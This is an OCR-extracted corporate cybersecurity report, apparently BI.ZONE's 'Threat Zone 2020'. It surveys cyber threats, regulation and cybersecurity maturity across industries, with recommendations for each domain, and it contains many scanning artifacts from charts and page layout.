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a hacker attack? 


ZN ole) 0) = 1740) Ni = 60 


140 





Executive 
lelaalaat-lavd 


Attacks Attacks Attacks Cybersecurity Cybersecurity maturity 
ova laxelbvsreler-lis olame)cer-lalist-lalelal= ola oy-lal.e figures across industries 


(Or-Tamyelem-i1-lale 
against a hacker? 


pNeyelens 
3140) NI = 


As@usuuns 


SAIVNIOXA 


> 
ce 
140) 
= 
= 
2) 
ep) 
Oo 
vm 
= 
— 
ey 
oO 
DK 
LU 





THREAT ZONE 


yioyte) 


SalJJSNpul ssos9e 
Aqyinyew Aywsinosasiaqhyd 





soinBlj 
wb alel-)-¥-Je 1.0o) 


syueq UO 
syoeqlyv 


10 (eo) hi =t-9 101-1 op (oO Le) 
syoenv 


slo! 


S|JENPIAIPU] UO 
syoenvy 


fh 


~dJayoey e ysuiebe 
pueys noA ued 


EIN oyail= 
ynoqy 





EF XeCUtIVE 7 
Slulaalaarclay, 


Tatsirelsiandal acre ies 
I K=xoi al ave) (ele | rer-) i= hVs-) alexos> 
Legislative framework E 


IN atViiclaceelare mse) enarelats} 


pNeyelels 
3140) NI = 





Se 
‘ip © 
3 E 
oe 
x 5 
Lu Ww 


ai. 

| 

- 
<r 


3 7 a i 
i. = 









_ : h a 
) . 2 
"a “7 v: ay E% 
Gas -Chiclalohcoll o-No-lUls-o Ml o\adat-Wiasie-loilin Vy; 34 
of certain markets, the economy as F 5 
a whole or the socio-political climate. o 
Over the years, the business community 
and state authorities have learnt to adapt > 
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for such situations. 


For the time being, analysts should focus 
on exploring the risks for a potential cyber 
crisis. This probability grows by the day. 
The destructive nature of such events 
smexo)aa) eY-]¢-10)(-meenea(-m-1hi-1e1e-me)mero)anlaarelal hy, 
occurring disasters. Yet most companies 
(7'7%') are not at all prepared for such 
cases. 


Attacks Attacks 
folame) cer-lalist- 1a (elal= ova el-)al.e- 


| | 


Attacks 
ola fare iavare ler=] is 





(Or TamVolem-in-Tale 
Yor-1ia\=imr- il at-[el.<-) at 


1. IBM study: more than half of organizations with cybersecurity incident response plans fail to 
test them // IBM Newsroom. 
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m Number of Internet users (left axis) 


The share of the Earth’s population using the Internet, 
2005-2019. 
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The good news is that there are still ways 

to ensure protection against cyber crises. Sadly, 
these ways require continuous investment 

of resources and cooperation, this goes 

ife)m ole ldailarel\alel0relme)aetclalisy-lule)alcuclalem=ialtics 
countries alike. 


There is an ongoing discussion between 
research groups, academia and major 
[altciaarciile)ar-|me)aelclalisiclUelaisyacielelamr-ISmugionOIN 
and national Computer Emergency Response 
Teams (CERTs), about the importance 
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exchange.” 
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world closer. According to the International 
sT-i<Yorolaalanlelaliersicoanelalosam (une) miatcmalelanle\\s 
of Internet users, since 2005, has been 
increasing at the rate of 10% per year and 

in 2019 reached an estimate of 4.1 billion. 
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An effective cybersecurity strategy depends 
(o)as\=aV.-1 8-] mere) ale |] 4(0)arspme)a\cme) im tal-laamicmtalc 
readiness for a cyber crisis, which is facilitated 
by a good understanding of current threats. 

In the upcoming years, we are going to see 
two major factors play a vital role in shaping 
the future of cybercrime: insider threats and 
technological advances. No doubt that the 
OLONVAI Denko ey-|alel<iaalomiswr-l|tar-lehvmevarcli(ciale]iare) 
our ideas of ‘normal’. The resulting economic 
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world to adapt to a new reality of remote work. 
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The many security incidents from 2019 serve 
as a stark reminder to everyone that when 

it comes to securing the external perimeter 

it is crucial to be mindful of the risks posed by 
malicious insiders. 


According to a survey, 69% of organisations 
associate data leaks with insider threats* — you 
may remember some cases popping up in 
news feeds. One of them was in last September 
WiVialoiamdatom\VKelteNASiclamellAllarom\Urclilarelom-\imarclemualc 
data of 45 million passengers stolen by two 
employees working for a contractor company.° 


By far not all companies are reliably protected 
from such threats, even when it comes to the 
cybersecurity industry itself: in February, Palo 
Alto Networks had the personal data of seven 
employees leaked onto the Internet all due to 

a contractor error.® 
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5. Malindo Air says data leak caused by ex-staffers at 
contractor firm // Reuters. 


6. /Zemployees who worked at cybersecurity giant Palo 
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after a partner ‘inadvertently’ posted personal info to a 
website // Business Insider. 
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Percentage of users with basic computer skills, 2014-2018 


Source: ITU 


The human factor, however, is not always 
associated with malicious intent or errors 
in work: oftentimes a compromise may be 
attributed to a mere lack of cyber literacy. 


As reported by ITU, in 40 of the 84 countries 
where the data is available, less than 50% 
of the population has basic computer skills 
(Remere)e) yale mil(osurelaleMvea<ialemnuieanciantelip» 
The percentage of those who can perform 
more complex operations is even smaller.’ 


Such computer illiteracy points to a lack of 

even the most basic understanding of cyber 
hygiene. A good example here is Lazarus attack 
on Redbanc, a Chilean company: the bank's 

IT specialist opened malware disguised as 
We)cele|e-lanlanl=mie)mil|iiare meleim(e)em-]0)8)|(er-1t@) alse 

a alismaalisitcl com tcsie] itso] ameat-mere)an]e)ce)aalixone)i 
Redbanc's corporate network.® 
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comfortable, but they also present a plethora 


of new cybersecurity challenges. 


The industry of loT (smart kettles, refrigerators, 
and other household devices connected to the 


Internet) has been evolving with a focus on 
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Such approach has had a negative effect on 


these devices’ protection from intuders. 


As a result, hackers have access to billions 
of devices, which are currently being 


incorporated in a bulk of networks used 


for DDoS attacks. 


Global lol malware attacks, 2018-2019, millions 


Source: SonicWall 
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will be transmitted at the rate of 20 gigabits 
per second with up to 4 milliseconds delay'® 
(for comparison: LTE/4G supported up to 
1,000 megabits per second with up to 20 
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At the same time, the new generation networks 
are less centralised and to a lesser extent rely 
on hardware. This makes it difficult to defend 
against attacks and respond to incidents." 
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Frequency of Al use in cybersecurity tasks 


Source: Capgemini Research Institute 


Biometric data is becoming increasingly 
popular for authentication: unlike passwords, 

it does not require a user to memorise it, strictly 
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However, biometric recognition systems 

can be deceived, and if the information gets 
compromised, it is quite difficult to substitute 
it in case of a particular user.’? 


Artificial intelligence (Al) has useful 
applications in almost every field, and in 
cybersecurity, especially. It enables companies 
to automate and speed up multiple routine 
tasks: filter soam, scan the perimeter for 
vulnerabilities, collect and process big data 
about previous threats. 
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easily misused to help attackers create more 
advanced malware and credible phishing 
emails.'* 
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14. Adversarial artificial intelligence: winning 
the cyber security battle // Information Age. 
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Markets and Markets. 
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The Security of Critical Information 
Infrastructure Act, which was passed in the 
Russian Federation early 2018, has become 

an essential step forward towards enhancing 
cybersecurity in the key sectors of the Russian 
Yore)alo)aa\varelale mia] celele]alelelmuatomerclal dialemiarelelsiiays 
in general. 


ii a\cmalcw a \o1m ©)ce)ae]0ltcremer-1a0-|lamlalelelsiagi-romce) 
start developing regulatory documents on 

the matter. Thus, in August of last year the 
Russian Ministry of Energy enforced a bill 
which mandates cybersecurity requirements 
to be approved when developing remote energy 
services monitoring systems.'’ Among other 
things, the document regulates safe collection 
elalemsice)ge\e[-melmlalce)aaarcieeam lacie lelamcyscit-lanisy 

it also determines the necessary actions and 
defines types of vulnerabilities and breaches 
when building threat models.'® 


Nevertheless, It is obvious that the problem 
goes deeper than that. Protecting critical 
infrastructure is not enough to create a truly 
secure cyberspace. In a globalised world, 

an attack committed in a particular industry 
may result in cybersecurity incidents in other 
industries. Therefore, key area security 
requirements have to be applied on a federal 
level to all segments of the national economy. 


17. Zaregistrirovan prikaz Minenergo Rossii utverzhdayushii 
trebovaniya k informatsionnoy bezopasnosti sistem 
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Ministry of Energy order adopting requirements to the 
cybersecurity of the power supply remote monitoring 
systems has been registered] // Minenergo Rossii. 


18. Prikaz Ministerstva energetiki Rossiyskoy Federatsii ot 
06.11.2018 g. no. 1015 [Order of the RF Ministry of Ener 


no. 1015, date: 06.11.2018] // Rossiyskaya Gazeta. 
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Meanwhile, the issue of protecting personal 
data is still the prevailing factor in foreign 
cybersecurity acts and regulations. 


On January 1, 2020, the California Consumer 
Privacy Act (CCPA) came into force. 

Ai atcmicrelisi(1ele)am sym amantcla\va cess) e\-ce1ecwes) aalitele 

to GDPR, General Data Protection Regulation 
enforced in the EU since May 2018. Under 

ida\cm O10) p7-\Waroxe) an] ey-lali=ssmarcialelllalem el-lesxelarclmeleita! 
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users about their data being collected and how 
itis shared. The act also provides users with 
the opportunity to request information about 
themselves as well as to prohibit the sale of 
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Cybersecurity experts in the US believe that 
Tin all felarsl@lesurs aon ole10]/alemron olomslalclellsiem|amelialsis 
states sooner or later.7° 
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the reader about relevant cyber threats and the be aware of one fact: if a single country or even 
methods of protection against them. Also we company is unprepared.a the cyber crisis, the 
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Cybercrime tends to step right over national P a o 

exchange incident-related data and work out 
borders, which means that the crises 
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between companies, industries and countries 
can result in exclusive opportunities in dealing nr’ 
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Cybersecurity maturity 
across industries 


Consider the largest national airline or the 
organiser of the most important football 
competition in the world, an innovative 
school or a food delivery service... At a first 
glance, these companies seem to have 
nothing in common. However, BI.ZONE's 
experience shows that, in fact, they do. They 
all strive to provide an adequate level of 
cybersecurity (hereinafter referred to as CS). 
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figures 
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Each company has Its own understanding 
of ‘adequate’ when it comes to CS. For 
some, It is enough to simply develop basic 
documentation to ensure formal compliance 
and avoid punitive sanctions from the 
regulator. While others see the importance 
of keeping up with the introduction of 
modern technological solutions capable of 
effectively resisting cyberthreats. 
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Cybersecurity maturity 
across industries 


In the end, everything depends on 

the CS maturity, i.e. current level of CS 
processes maturity, planned budgets, 
the top management involvement and 
many other factors. 


Cybersecurity 


Our projects have allowed us to 
accumulate lots of information about 
the level of CS maturity in different 
organisations. For Threat Zone 2020, 
we have generalised this data, and thus 
came about the industrial comparison 
of CS maturity. 
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Scope and method 


What companies we 
compared 


We sampled companies from the following 
seven industries: healthcare, media and 
e-commerce, transport, finance, retail, 
telecommunications and IT. 


Our respondents included Russian and 

foreign organisations whose CS systems we 
had previously audited. Altogether, the study 
involved the statistics of 152 companies that 


have been accumulated by BI.ZONE since 2018. 


We had no intention to categorise companies 
by size for this study. For instance, the IT 
industry sample included mostly start-ups 

and small companies, while the transport 
industry ranged up to some of the largest 
national operators. We did not consider this as 
a relevant feature for the comparison since our 
observations show that the size of business is 
not always related to its level of CS maturity. 
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How we compared 
the companies 


The analysis was based on a comprehensive 
framework developed by BI.ZONE on the basis 
of its own experience and the best global CS 
practices. 


This framework gives structured criteria for 
assessing CS maturity in 12 domains which 

are considered to be the most relevant and fast- 
growing in the expert community: 


1. Cybersecurity Governance. 
Cybersecurity Awareness 


. Asset Management. 


2 
2 
4. Information System Access Control. 
9. Physical and Environmental Security. 
6. Operational Technology Security. 

~ 


Communications Security and Third-Party 
Management. 


8. Incident Handling and Response. 
9. Recovery and Continuity. 

10. Compliance and Data Privacy. 
11. Cryptography. 


12. SSDLC — Secure Software Development 
Lifecycle. 
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How we presented 
the results 


We assessed the sampled companies by each 
of the mentioned framework domains and 
produced a fair evaluation of the level of their 
CS maturity. 


After comparing all evaluations, we calculated 
an overall CS maturity level for each industry. 
The results are shown in the diagram below. 


In quantitative terms, the values vary from 0 to 
5, where 5 shows that the CS processes in the 
company are measurable, constantly improved 
and compliant with the best global practices, 
while 0 shows that there are no CS processes 
at all and no effort is being made in that 
direction. 


Values for each domain of the framework are 
given in the corresponding parts of the Results 
section. 


Other data obtained 


For some aspects of CS, we calculated 
indicators that can be applied to the entire 
market. These indicators are presented 

in percentage values. 
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How this information 
helps 


Hopefully, the information presented in this 
chapter will help companies answer questions 
about their own CS maturity: ‘Where do we 
stand among our competitors?’ and ‘What 
direction should we take next?’ Being aware 
of these can give a company a substantial 
boost in profitability and market presence. 


Using our framework, you can quickly assess 
the current level of your CS maturity and 
choose where to focus your effort. 
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Results 


Cybersecurity Governance 


This area involves conceptual aspects of CS 
management and addresses such issues 

as: how a company integrates CS with 
Strategic tasks of its business, whether the 
management is properly informed about the 
importance of CS, what principles are followed 
when allocating resources and how risks are 
evaluated, etc. In other words, these are the 
issues that express a company’s intentions in 
the field of CS and precede all other decisions. 


The vital nature of CS management seems to 
need no explanation, especially in light of losses 
and risks that can occur in case of insufficient 
CS program development. For instance, the 
average total losses incurred by companies as 
a result of data leaks amounted to $3.92 million 
in 20191 


ay a 
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In reality, the C-suites rarely take any interest 
in cybersecurity. According to our statistics, 
only 54% of companies have their CS-related 
meetings attended by Management on 

a regular basis. 


So, when comparing CS maturity by 

industry, we can see that the industries 
where Management Is involved in CS to the 
greatest extent are financial and e-commerce 
organisations. This is quite natural since 
these industries are the greatest sufferers 

of cyberattacks; therefore, top management 
in these companies cannot afford not to care 
about security of clients’ data and company 
reputation. 


First of all, companies should rely on the 
risk-oriented approach. It is not a good idea 
to implement CS products just because 

they are considered modern or in fashion, 

or because a vendor advertises a package 

of so-called ‘unique solutions’ at an attractive 
price. It is vital to start with the assessment 
of CS risks to select an adequate approach 

in mitigating them. 


Secondly, managers should take a more 
active part in solving CS-related problems. 

It is not enough to hire in-house experts or 

to outsource this responsibility. Company 
managers must show keen interest, take 

on leadership and display commitment to the 
CS management system. 
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of large businesses do not 
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Cybersecurity Awareness 


Contemporary cyberthreats mostly exploit 
the human factor — phishing and social 
engineering are responsible for 90% of 

bank frauds, which we discuss in chapter 
‘Cybersecurity in numbers. Businesses lose 
$17,700 each minute due to phishing attacks.” 













A company's security depends largely on the 
actions of its employees. The understanding 
of such risks encourages many organisations 
to invest in basic CS awareness training and 
regular testing. 








ta Ge: 2. The evil Internet minute 2019 // RisklQ. 


d) 
2 
Pw) 
= 
S) 
d) 
x 
Lu 


Cybersecurity maturity 


Attacks Attacks Attacks Cybersecurity 
folame) cel-lalist-lalelal= ola oy-lal,<= 


olam latelhvarelerel is 


(Or-TaaV(ole m-1m-lale| 
against a hacker? 


> 
o 
S 
E 
=| 
7) 





across industries 


figures 





SIW4e) N= 





THREAT ZONE 


2020 


According to our data, 38% of companies pay 
no attention to cyberthreat awareness among 
their staff. 


An industry comparison shows that retail 
Stands out in this domain as companies in this 
sector tend to systematically neglect digital 
hygiene training for their personnel, relying 
solely on corporate information protection 
systems. 


It is reckless to ignore the importance of 

the human factor. The number of social 
engineering attacks is only going to rise in the 
future, since it is much easier to compromise a 
credulous user than to bypass a professionally 
built security system. 


That is why we consider it crucial that company 
managers realise, once and for all, that people 
play a key role in the security of their company, 
rather than technical measures or documented 
policies. 


We also recommend the following: 


assessing risks and losses related to possible 
attacks through employees; 

performing regular in-person or online CS 
training for employees; 

simulating attacks on employees every 

few months using realistic phishing letter 
templates and relevant scenarios then 
evaluating their reaction to such attack. 
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Asset Management 


About the domain 


Assets mean all objects that process business- 
sensitive information, such as servers, laptops, 
computers, smartphones, flash drives, system 


or application software and, of course, the 

information itself. O 

The goal of asset management is to determine Ye 
the company’s information assets and develop 


models to protect them. This should cover 
the entire asset lifecycle, not just their active 
operation. As a Stellar study shows, about 71% 
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In terms of asset management, the leaders 

in the domain are companies from the 
financial sector, transport, retail, media and 
e-commerce. BI.ZONE explains that this can 
be attributed to the availability of resources 
and the efforts to reduce the risks for business 
in cyberspace. In financial organisations, 
there is another stimulating factor, which is 
Strict regulations. In the financial sector, we 
can see that processes of classification and 
labelling of information are well established, 
assets involved in processing of sensitive data 
undergo regular stock control procedures with 
their owners and users carefully following 
corporate CS policies. 


On the other hand, these aspects are still 
underdeveloped in |T companies. This is 
caused by the competitive drive to focus on the 
development of unique and necessary products 
features and to put boring CS matters aside for 
later. 


First, organisations should be fully aware of 
what information falls within the scope of the 
requirements of regulators, what information 
defines the company’s success in the market 
and should be considered confidential, and 
what information can be shared with clients 

at an international congress or with friends over 
a cup of tea. 


Second, organisations should conduct stock 
checks of assets that process this information 
and regularly update the list of persons 
responsible for these assets. 


Third, organisations should set procedures 

in place for handling data storage devices 
including the management of removable media 
and the control of their relocation and reliable 
disposal. 
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Information System 
Access Control 


This domain is a fundamental component of 
CS. It allows to efficiently prevent unauthorised 
access to information resources and is 
founded primarily on three As: authentication, 
authorisation and audit. 


Problems encountered within the scope of 
this domain are often related to obsolete 
approaches to access control. For instance, 
although the login-password combination was 
declared unreliable by the expert community 
along time ago, many companies still actively 
use it for authentication. Even though more 
advanced solutions (SMS authentication, etc.) 
are not that much more expensive, they are 
not introduced mostly because people are too 
accustomed to the old ways. 


If further neglected, this domain can suffer the 
same situation described in Varonis research. 
According to the study, 53% of organisations 
found that more than 1,000 of their confidential 
documents could be accessed by any of their 
employees.* 


N 55% 


of companies, more than 1,000 
confidential documents were 
accessible for any employee* 


4. 2019 Varonis global data risk report // Varonis. 
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Authentication is required to 
gain access to the system. At this 
Stage, the system ensures that 
access Is really demanded by 
John Doe rather than someone 
who pretends to be him. To 
confirm their identity, users 
provide unique passwords, 
fingerprints, electronic signatures, 


etc. 





Authorisation is required to 
perform specific actions in the 
system, for instance, to open, 
modify or delete documents. At this 
stage, the system monitors whether 
a user has the necessary rights to 
perform corresponding actions. 


Audit is introduced to monitor 
system events, such as attempts 
to log in, to access files or to make 
modifications. In case something 
goes wrong in the system or an 
incident occurs, audit allows to 
open an event log and to identif 
the problem. 
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First prize in identity and access management 
inside information systems goes to the 
financial sector. This is no surprise, given the 
requirements of regulators and the banks’ own 
desires to keep their client data safe. 


To increase the maturity level in this CS domain, 
we advise the following: 


- consider using rigorous authentication 
mechanisms (at least for business-critical 
information systems); 

- use Identity Management systems; 

- keep an eye on administrators and other 
privileged users who have unrestricted 
access to sensitive data. 
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Physical and 
Environmental Security 


Physical access control had appeared even 
before the concept of cybersecurity. It was 
designed to minimise the most expensive 
of risks. For example, thefts committed by 
employees cost their companies $50 billion 
every year in the USA.° 


Conventional measures are pretty good for 
solving tasks in this domain. Therefore, physical 
security is one of the most conservative 
components of the CS system. Very few 
changes occur in the domain. Once introduced, 
solutions work well, while innovations, Such as 
biometric access control systems, would mean 
unjustified expenses for most companies. 


$ 
billio 


fine. 


D,! 


5. Employee theft statistics // 


Statistic Brain Research Institute. 
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It also should be noted that although the 
access control in organisations usually 
complies with the requirements of the best 
practices in this field, their control of internal 
movement cannot be referred to as strict. Yet, 
this is important when it comes to the security 
of servers and equipment processing sensitive 
information. 
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A good level of maturity in physical security was 
observed amongst companies in e-commerce, 
transport and finance. For these companies it 
is customary to keep the equipment separate 
from personnel, in dedicated data centres. It is 
a good practice since data centres are built in 
accordance with the operational sustainability 
requirements (TIER) and are known for the 
high-quality access and relocation control. 


First and foremost, we recommend paying more 
attention to control of the access to internal 
areas of the company. 


When possible, we recommend considering 
keeping information systems in a data centre 
that complies with at least TIER 3 requirements. 
This will ensure integrity of equipment that 
processes sensitive information. 
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| > 
Cybersecurity 2 
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CS maturity does not mean isolated actions A banking trojan is a type of a. 
and one-time attention to an encountered Lalani anon leorianie % 9 
— 8 money from users. This malware 5 
problem, risk or incident. Maturity is achieved aims to gain access to the victim's 4* 
by a continuous repetition of actions that bank account or cryptocurrency U 


wallet. 


ensure security of networks, computer systems 
and apps and keep them accessible by: 


- controlling applied software; 

> monitoring events in the corporate network; 

- making backup copies for system recovery in 
case of an incident; 

- searching for and patching vulnerabilities 
in the infrastructure, etc. 


Cybersecurity 


This set of measures defines operational 
security. 


Operational security is based on the 
understanding that if you were protected 
yesterday, it does not mean you are protected 
today. For instance, experts have been familiar 
with such a class of malware as banking 
trojans for a long time. If the developed 
measures of protection against them had 
remained relevant, the number of trojan 
infections would have reduced over time. 
However, in the first half of 2019, this type 

of malware attacked 7% more individuals and 
corporate users than over the same period 

of the year before.® 
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The lowest level of maturity in the field of 
operational security is shown by the IT and 
retail. Representatives of these industries 
prioritise results of business activities and tend 
to pay little attention to the processes that 
Support these very activities. 


To maintain a high level of security of operations 
technology, we recommend: 


ensuring control of modifications in the 
infrastructure; 

ensuring monitoring of and timely response 
to security incidents; 

ensuring proper management of software 
installation; 

conducting information backup procedures; 
following vulnerability identification and 
patching procedures; 

taking adequate measures for protection 
against malware. 


O 





users suffered attacks from 
banking trojans in the first half 
of 2019° 
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Communications 
Security and Third Party 
Management 


About the domain 


across industries 


Data leaks can be caused not only by a weak 
security system, but also by an underdeveloped 
model of communication with contractors. 


Cybersecurity maturity 


This was the reason why 540 million Facebook 
accounts ended up in public access. It started 
with Facebook hiring a contractor to develop 
one of its apps. The contractor, as it turned out, 
had serious vulnerabilities in tts system security. 
The server which the contractor used to store 
Facebook user databases was accessible by Facebook accounts leaked 
anyone from the Internet, and did not even online due to a mistake of 


require a password.’ a subcontractor’ 


Security of communication with contractors is 
just one component of this CS domain. It also 
involves matters related to security of data 
transfers via telecommunication channels. 
Throughout our projects, we encountered 
numerous situations when endpoints of 

a particular organisation were secured, but 
there was a high likelihood of leaks when data 
was transferred outside the corporate network. 
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The level of maturity in this CS domain is 
below average in almost all the industries 
tested. Moreover, leaks of commercial secrets 
and personal data is bound to occur since 
businesses do not take into account the risks 
associated with data emigration. 


First, we recommend that companies 
thoroughly monitor compliance with CS policy 
in relations with vendors. 


Second, we recommend ensuring control 
of network access and secure transfer of 
sensitive information between all stakeholders 
both at the organisational and technical levels. 


Finally, if a business needs to grant system 
access to a third-party organisation, we 

advise to do a preliminary risk assessment 

to understand possible outcomes and to 

set the requirements to CS management 
activities. In our opinion, the most effective 
way to determine such measures is to stipulate 
them in contracts with third parties. 


Protection research 36 
Finance 
Healthcare 26 Telecom 


2.4 





1.8 
2.1 
18 
Retail iT. 
1.7 2.4 
Media/ Transport 


E-commerce 


Assessment of Communications Security & 
Third-Party Management 


J) 
2 
ra) 
a) 
6) 
J) 
x< 
LL 


Cybersecurity maturity 


Attacks Attacks Cybersecurity 
ola ey-lal.e= 


folame) cel-lalist-lalelal= 


Attacks 
ola fare lavarelerel is 


— 
Oo WwW 
cx 
8% 
a a 
5 0 
SP 

i) 
cc 
— 

© 
te) 
ro 


yNeyelels 
3140) NI = 


> 
o 
S 
S 
= 
7) 





across industries 





THREAT ZONE Protection research 


2020 


Incident Handling and 
Response 


All companies aim to prevent CS incidents 
within their infrastructure. But when companies 
focus too much on prevention, they fail to 
consider the possibility of such incidents 
occurring. In contrast, organisations with a 
mature level of cybersecurity plans in advance: 


in case of an incident, how to recover 
normal functioning of business services In 
accordance with clients expectations and 
obligations to counterparts; 

what actions will be required to minimise 





Ox 


adverse effects of an incident. in annual growth 
In this CS domain, planning should be based of the number of 
on the ‘when’ rather than on the ‘if a scenario cyberattacks® 


will happen. This is only logical, since 
cybercriminals have become increasingly active 
and more companies have faced digital attacks. 
In 2019, the number of attacks exceeded those 
of 2018 by 19%; in 81% of cases, victims were 
legal entities. 


Criminals mostly attack government bodies, 
industrial enterprises, medical institutions, as 
well as financial, research and educational 
organisations.® 


8. Aktual'nye kiberugrozy: itogi 2019 goda [Relevant 
cyberthreats: 2019 in review] // Positive Technologies. 
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Market analysis 


We noted that aspects of incident handling and 
response are well-developed in all industries, 
which means that companies understand why 
ignoring this CS domain can be dangerous. 
The best results were demonstrated by the 
finance and e-commerce industries that are 
heavily influenced by regulatory requirements. 


Recommendations 


Establishment of a Security Operations Centre 
(SOC) is the most effective way to ensure 

a mature response to CS incidents. To organise 
a SOC, the company can either use its own 
resources or outsource this function toa CS 
vendor. 


If such a measure is not economically feasible, 
we recommend launching a cyber incident 
handling process based on the best global 
practices. A good source would be a standard 
like ISO, NIST, and industrial requirements 
of regulators. 
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Business Recovery and 


Continuity 2 
2 o 
O°x 
About the domain a 
Sie) 
When companies face difficult times, their 5 - 
first priority is to ensure the continuity of their oD e 
oO 
processes. . 


Companies often experience situations the 

results of which depend on maturity of this . 
CS domain. In the past two years, at least 40% 

of Russian companies faced major incidents 

that led to interruption of critical business 

processes which lasted over 4 hours.’ 










Cybersecurity 





companies is unable to 
ensure stable business 
orocesses in case of failures 
In their IT infrastructure 
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Despite the obvious importance of this process, 
our Statistics show that most companies are 
not prepared for an emergency recovery. 


83% of companies have no detailed recovery 
plans to maintain business continuity and 
recover business processes as well as 
infrastructure and applications; 


20% of corporate infrastructures are unable 
to ensure the projected level of service in 
case of failures. 


Our industrial analysis shows that financial 
companies have the most developed aspects 
of business continuity. It is not surprising since 
split seconds could cost millions in this field. 
Besides, financial organisations are under strict 
Supervision of the regulators. 


Business continuity and recovery has 
become an increasingly pressing issue 

for both small and large companies. The 
events that the international community has 
recently faced — the emergency measures 
for combatting COVID-19, the growth of 
unemployment and the resulting financial 
crisis — have made organisations re-evaluate 
the importance of being able to respond to 
critical situations in a timely manner. 


According to our forecasts, within the next 
two years, companies from the global market 
will prioritise the implementation of continuity 
maintenance and disaster recovery processes, 
including the conditions of limited access 

to workplaces. 


Despite the labour intensity and high 
complexity of these works, we recommend that 
all organisations define measures that will allow 
them to ensure continuity at least for the critical 
systems. 
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Compliance and Data 
Privacy 


Every year, more new requirements continue to 
appear for companies in the market to comply 
with. 


Cybersecurity maturity 
across industries 


Although many companies have not recovered 
after the stress and costs related to compliance 
with Federal Law No. 152-FZ ‘On personal data’, - 187-FZ for critical information infrastructure; 
Russian and global regulators have developed 
new and more comprehensive cybersecurity 
and privacy requirements, such as the 
following: - CCPA for protection of personal data of 
California residents. 


GOST 57580 for financial organisations; 


General Data Protection Regulation (GDPR) 
for those who work with EU citizens; 


Cybersecurity 
figures 


Failure to comply with the requirements would 
cost companies dearly. Amounts of the largest 
fines for the violation of GDPR in 2019 make 

it clear why it is So important to conduct timely 
CS audits and fix the deficiencies. For example, 
British Airways was fined €204.6 million, and 
Mariott International — the international hotel 
franchise — was fined €110.4 million." 
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According to our statistics, 38% of companies 
do not conduct CS audits on a regular basis, 
and more than 85% of companies have 

not assessed the applicability of GDPR 
requirements to their business processes. 


However, it should be noted that the 
compliance procedure is rather high on 
average across the industries. Though, 
media/e-commerce companies are the leaders 
in this field. It is mostly due to the availability 

of resources for regular compliance audits, as 
well as thorough inspection by regulators. 


We expect that compliance will remain the top- 
priority objective for the international business 
over the next three years. 


CS has become more and more grounded 

in the risk-oriented approach, which dictates 
that all decisions should depend on the 
individual risks of a company. And although 
that is the case, regulatory requirements to 
business are not going to be lifted any time 
soon. On the contrary, new regulation appear 
every year (Quick Payments System, Unified 
Biometric System), and industrial regulators 
keep broadening the set of their regulations. 


That is why we recommend that companies 
determine the legislation requirements 
applicable to them, audit compliance with them 
and take as many measures as possible to 
ensure compliance with them. 
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Cryptography 


As the digital economy grows, businesses are 
Starting to rely more on the public segment 
of the Internet to transfer and even store all 
data necessary for work, including sensitive 
corporate information and clients’ data. 


In these conditions, the only viable method for 
information protection is encryption. According 
to a research by McKinsey & Company, 84% 

of companies that use cloud services are 
considering encryption of their cloud-stored 
data." 


Cryptographic methods of protection are used 
not only for data transfer, but also for user 
authentication and authorisation. For instance, 
they are the basis of the digital signatures 
mechanism. 


Nonrepudiation is a great advantage of these 
methods. This became evident from the latest 
events when half of the world switched to 
remote work due to the COVID-19 pandemic. 
As a consequence, it has become difficult to 
use paper documentation, legal or otherwise. 
We are sure that digital signatures are about to 
develop rapidly in Russia and other countries. 
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Experience shows that companies mainly 

use cryptography to protect data during their 
transfer via public communication channels, 
and large organisations also use it in their 
internal document flow systems. The financial 
sector also uses cryptographic keys to conduct 
financial operations; this explains why its 
maturity level in this domain is higher than that 
of the other industries. 


However, as we Can See from the obtained 
Statistics, there are still areas for growth. 

For instance, most companies have no fully 
regulated cryptography application scenarios 
and no policies in the field of cryptographic 
protection of information. Moreover, they 
place the responsibility for the development 
and application of cryptographic keys on one 
employee. 


The most important measure for developing 
this domain is to shape and introduce policies 
on cryptographic protection of information into 
the company. 
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SSDLC — Secure Software 
Development Lifecycle 


The SSDLC concept includes the security 
issues related to the development and 
introduction of new software in the company’s 
infrastructure. SSDLC helps to integrate such 
security measures as penetration testing, 
code analysis and architecture analysis with 
product lifecycles. 


Our audits show that it is not enough to 

hire top-class developers who understand 
why programmes become hackable and 

how to prevent it. SSDLC is always about 

a comprehensive approach to the process of 
development. It is important to arrange SSDLC 
in such a way that CS measures do not slow 
down the business, and at the same time 

that no critical vulnerability gets into the final 
version of a product. 


SSDLC allows to avoid damage to reputation 
and large costs for patching a ready-to-use 


development. For instance, a Microarchitectural 


Data Sampling (MDS) class vulnerability 
was detected in Intel CPUs. This error allows 
to capture any user data. Thanks to the early 
detection of the vulnerability, Intel engineers, 
together with software developers, had 

time to prepare mechanisms to mitigate the 
vulnerability.'2 


12. Intel ZombieLoad flaw forces OS patches with up to 40% 
performance hits // VentureBeat. 
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Our study showed that transport, financial and Finance 
media companies take introduction of SSDLC 
procedures more seriously than others. The Lieaieneare ye Telecom 






causes may be different in each particular 
sector. In finance, it is the large number of 
regulatory requirements. In transport and 
media, it is a strong business dependence on 
their own products and services, as well as 
Strict requirements to quality of their work. 
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external CS specialists since they can perform Media/ Transport ~ 
an audit of the development process and help E-commerce 
implement the necessary processes with all Aecesemment chien 


aspects of the regulatory framework taken into 
consideration. 


If it is economically unfeasible to engage 
third-party experts, we recommend following 
the industry requirements to standards and 
best practices, in the field of secure system 
development, such as ISO/IEC 27034, 
Microsoft SDL, OWASP Secure SDLC. 
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Financially motivated attacks are connected 
with banks one way or another. Adversaries try 
to steal money either from financial institutions 
or their clients. This chapter describes the 
results of a study on cyber thefts involving 
Russian banks and their client accounts. The 
chapter also contains information about the 
victims and criminals, as well as types of fraud 
and its geographical spread for 2019. 


We have also included figures obtained from 
penetration testing of our clients. We have 
identified what security flaws are most 
frequently encountered in different types of 
corporate infrastructures and web applications. 
This chapter also presents analytical data 

based on the results of phishing simulations 
conducted inside companies. 
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Victims and 
attackers: 
the profile 


Cybersecurity 






There has been a slight increase in the average O 
age of cybercrime victims. In 2018, the most 55 % Male 


affected demographic was clients under 
35 years of age. However, in 2019, the 35-44 


age demographic almost caught up to the 45% Female 
20—-34-year range. 
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The average age of attackers has not O 
changed, with most being 25 to 34 years 545 % Male 


old. 34% of all fraudulent bank cards were 
issued to people from this age group. 
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Attacks on accounts 


Most of attacks on client accounts are performed using social 
engineering. In most cases, victims themselves willingly transfer 
money to the adversary. The usual scam involves fake messages 
about card blocks or attempts to withdraw money. 


The scale of criminal activity in this segment is impressive. Such 
groups even organise their own call centres. They hire full-time 
